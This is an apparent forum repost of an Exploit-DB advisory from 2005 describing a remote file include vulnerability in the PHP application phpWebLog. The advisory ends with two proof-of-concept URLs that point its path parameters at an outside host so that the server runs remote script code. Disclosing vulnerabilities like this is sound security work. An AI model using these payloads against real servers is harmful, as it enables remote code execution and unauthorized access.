- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 25193
- Проверка EDB
-
- Пройдено
- Автор
- FILIP GROSZYNSKI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2005-03-07
Код:
source: https://www.securityfocus.com/bid/12747/info
phpWebLog is prone to remote file include vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'include_once()' function call.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/phpWebLog/include/init.inc.php?G_PATH=http://www.example.org/
http://www.example.com/phpWebLog/backend/addons/links/index.php?PATH=http://www.example.org/
- Источник
- www.exploit-db.com